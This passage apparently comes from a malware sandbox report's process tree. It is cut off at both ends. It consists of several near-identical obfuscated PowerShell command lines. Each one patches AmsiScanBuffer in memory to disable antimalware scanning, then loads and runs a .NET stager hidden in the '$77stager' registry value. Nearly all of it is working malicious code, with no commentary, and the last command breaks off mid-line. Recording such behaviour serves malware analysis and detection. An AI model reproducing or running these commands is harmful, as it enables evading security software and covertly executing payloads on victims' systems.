eflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mtlzPjZzSKqBmHDphbv=PyaanalphKAi @([String])([IntPtr]);$OADtoLswQnkfXwmkdyfUMn=PyaanalphKAi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YoxReIpqkaM=$qhKKfiJfJFSly.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$ebyTXHxHEUURwc=$fkjNNaBNKWvFKa.Invoke($Null,@([Object]$YoxReIpqkaM,[Object](''+[Char](76)+'o'+'a'+''+'d'+'L'+[Char](105)+''+[Char](98)+'r'+'a'+''+'r'+''+[Char](121)+'A')));$RUhcaMgxvfHIrrvyh=$fkjNNaBNKWvFKa.Invoke($Null,@([Object]$YoxReIpqkaM,[Object](''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+'o'+''+'t'+''+[Char](101)+'ct')));$fatCsNc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ebyTXHxHEUURwc,$mtlzPjZzSKqBmHDphbv).Invoke('ams'+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$muGUcButBmJXKMyCy=$fkjNNaBNKWvFKa.Invoke($Null,@([Object]$fatCsNc,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+'c'+'a'+'nB'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$rRRkshHzoO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RUhcaMgxvfHIrrvyh,$OADtoLswQnkfXwmkdyfUMn).Invoke($muGUcButBmJXKMyCy,[uint32]8,4,[ref]$rRRkshHzoO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$muGUcButBmJXKMyCy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RUhcaMgxvfHIrrvyh,$OADtoLswQnkfXwmkdyfUMn).Invoke($muGUcButBmJXKMyCy,[uint32]8,0x20,[ref]$rRRkshHzoO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'age'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vEvxgClMiSCC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gOdgjzIYAJQrji,[Parameter(Position=1)][Type]$XTAYhxbUQM)$PQyglxuoYCx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+'ry'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+'ga'+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+'e'+''+[Char](97)+''+'l'+''+'e'+'d'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PQyglxuoYCx.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'p'+[Char](101)+'cia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$gOdgjzIYAJQrji).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$PQyglxuoYCx.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+'ig'+','+''+'N'+''+[Char](101)+'w'+[Char](83)+'l'+'o'+'t,'+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+'al',$XTAYhxbUQM,$gOdgjzIYAJQrji).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $PQyglxuoYCx.CreateType();}$SXjOYGzlfqHjF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType('M'+[Char](105)+'c'+'r'+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+'e'+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+'s');$ZMtmRhTiRqdayC=$SXjOYGzlfqHjF.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+''+'r'+'o'+'c'+''+'A'+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PnGpLrYmrlbzEABQOjQ=vEvxgClMiSCC @([String])([IntPtr]);$COGXIxcHBHaXzUdtRaMQSt=vEvxgClMiSCC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CFTIsNeUNoy=$SXjOYGzlfqHjF.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+'e'+[Char](72)+'a'+'n'+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$WKIhlaGevyyJBk=$ZMtmRhTiRqdayC.Invoke($Null,@([Object]$CFTIsNeUNoy,[Object]('Lo'+'a'+''+[Char](100)+''+[Char](76)+''+'i'+'bra'+'r'+''+'y'+''+'A'+'')));$PxwgEtBVqTkRiaqGj=$ZMtmRhTiRqdayC.Invoke($Null,@([Object]$CFTIsNeUNoy,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TsWVfxI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WKIhlaGevyyJBk,$PnGpLrYmrlbzEABQOjQ).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+'d'+'l'+'l'+'');$wbSRXIJOAgawxYNod=$ZMtmRhTiRqdayC.Invoke($Null,@([Object]$TsWVfxI,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+'f'+''+[Char](102)+'e'+'r'+'')));$YqpLJCVksB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PxwgEtBVqTkRiaqGj,$COGXIxcHBHaXzUdtRaMQSt).Invoke($wbSRXIJOAgawxYNod,[uint32]8,4,[ref]$YqpLJCVksB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wbSRXIJOAgawxYNod,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PxwgEtBVqTkRiaqGj,$COGXIxcHBHaXzUdtRaMQSt).Invoke($wbSRXIJOAgawxYNod,[uint32]8,0x20,[ref]$YqpLJCVksB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'T'+'W'+''+'A'+'R'+[Char](69)+'').GetValue('$'+[Char](55)+''+'7'+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UipHOUsSRygC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zKbZrblkflzJRw,[Parameter(Position=1)][Type]$IqEHWkhook)$ReoUAyIjjNN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+'e'+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+[Char](111)+''+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'S'+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ReoUAyIjjNN.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+'a'+'m'+'e,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$zKbZrblkflzJRw).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+'d');$ReoUAyIjjNN.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+'Vi'+[Char](114)+''+[Char](116)+''+'u'+'al',$IqEHWkhook,$zKbZrblkflzJRw).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+'ed');Write-Output $ReoUAyIjjNN.CreateType();}$BXazZgzBGJbPH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+'v'+[Char](101)+''+'M'+'e'+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$kgmIHMlzhKMjHU=$BXazZgzBGJbPH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yLnPfKCkeyDzisVDayy=UipHOUsSRygC @([String])([IntPtr]);$QXenrvPRAZtMTSNKwfshnF=UipHOUsSRygC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AuvzlRvUTwi=$BXazZgzBGJbPH.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+'2'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$susiKBlvkNKqnY=$kgmIHMlzhKMjHU.Invoke($Null,@([Object]$AuvzlRvUTwi,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+'y'+[Char](65)+'')));$gNIIafQCEixWlnvNE=$kgmIHMlzhKMjHU.Invoke($Null,@([Object]$AuvzlRvUTwi,[Object]('Vi'+[Char](114)+'tual'+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$OQJhrhW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($susiKBlvkNKqnY,$yLnPfKCkeyDzisVDayy).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$CVhjHZauYSwnHcfmB=$kgmIHMlzhKMjHU.Invoke($Null,@([Object]$OQJhrhW,[Object](''+'A'+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$YVMeyfhlak=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gNIIafQCEixWlnvNE,$QXenrvPRAZtMTSNKwfshnF).Invoke($CVhjHZauYSwnHcfmB,[uint32]8,4,[ref]$YVMeyfhlak);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CVhjHZauYSwnHcfmB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gNIIafQCEixWlnvNE,$QXenrvPRAZtMTSNKwfshnF).Invoke($CVhjHZauYSwnHcfmB,[uint32]8,0x20,[ref]$YVMeyfhlak);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jHHQemBRcmfY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TKoZBVdhgBXpRT,[Parameter(Position=1)][Type]$NUuVZKnKte)$amhKWHzUWpt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'ect'+'e'+''+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType('My'+'D'+''+'e'+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$amhKWHzUWpt.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+'ec'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+'i'+'g,'+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$TKoZBVdhgBXpRT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$amhKWHzUWpt.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+'l',$NUuVZKnKte,$TKoZBVdhgBXpRT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $amhKWHzUWpt.CreateType();}$NUHHHHcqlqLAW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Syst'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+''+'W'+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eMe'+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$uuYuJvwlmyfSSc=$NUHHHHcqlqLAW.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rBKjocwFafaCXjByYcc=jHHQemBRcmfY @([String])([IntPtr]);$VZxjehijiAyTvJOvwTwcJG=jHHQemBRcmfY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OpoDMkHNCvR=$NUHHHHcqlqLAW.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+'a'+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+'l'+''+[Char](108)+'')));$ISYpVeeDSkTHSv=$uuYuJvwlmyfSSc.Invoke($Null,@([Object]$OpoDMkHNCvR,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$zJLkdycCnNUHaQsWb=$uuYuJvwlmyfSSc.Invoke($Null,@([Object]$OpoDMkHNCvR,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l'+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'e'+'c'+''+[Char](116)+'')));$NtoEtNG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ISYpVeeDSkTHSv,$rBKjocwFafaCXjByYcc).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$BjEpfyWNiaByKShCt=$uuYuJvwlmyfSSc.Invoke($Null,@([Object]$NtoEtNG,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$uKrxiPmXGf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zJLkdycCnNUHaQsWb,$VZxjehijiAyTvJOvwTwcJG).Invoke($BjEpfyWNiaByKShCt,[uint32]8,4,[ref]$uKrxiPmXGf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BjEpfyWNiaByKShCt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zJLkdycCnNUHaQsWb,$VZxjehijiAyTvJOvwTwcJG).Invoke($BjEpfyWNiaByKShCt,[uint32]8,0x20,[ref]$uKrxiPmXGf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+'s'+''+[Char](116)+'age'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bnVMHorrDtET{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CfbUhkYElewnXW,[Parameter(Position=1)][Type]$uDxungQcLz)$ApRrcCtrKID=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+'e'+'gate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ApRrcCtrKID.DefineConstructor(''+[Char](82)+''+'T'+'Sp'+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CfbUhkYElewnXW).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me,'+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$ApRrcCtrKID.DefineMethod(''+'I'+''+[Char](110)+'vo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bli'+'c'+''+','+'H'+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+'S'+'i'+'g'+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$uDxungQcLz,$CfbUhkYElewnXW).SetImplementationFlags(''+[Char](82)+'u'+'n'+'t'+[Char](105)+'me,'+[Char](77)+'a'+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $ApRrcCtrKID.CreateType();}$sZQzkaJlGUVCE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'so'+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$qoPxCFiyCuasQc=$sZQzkaJlGUVCE.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+'li'+'c'+','+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KVRWjDuSwhlErcTRzXv=bnVMHorrDtET @([String])([IntPtr]);$UvzFkaIdQkGADgASDbHbDY=bnVMHorrDtET 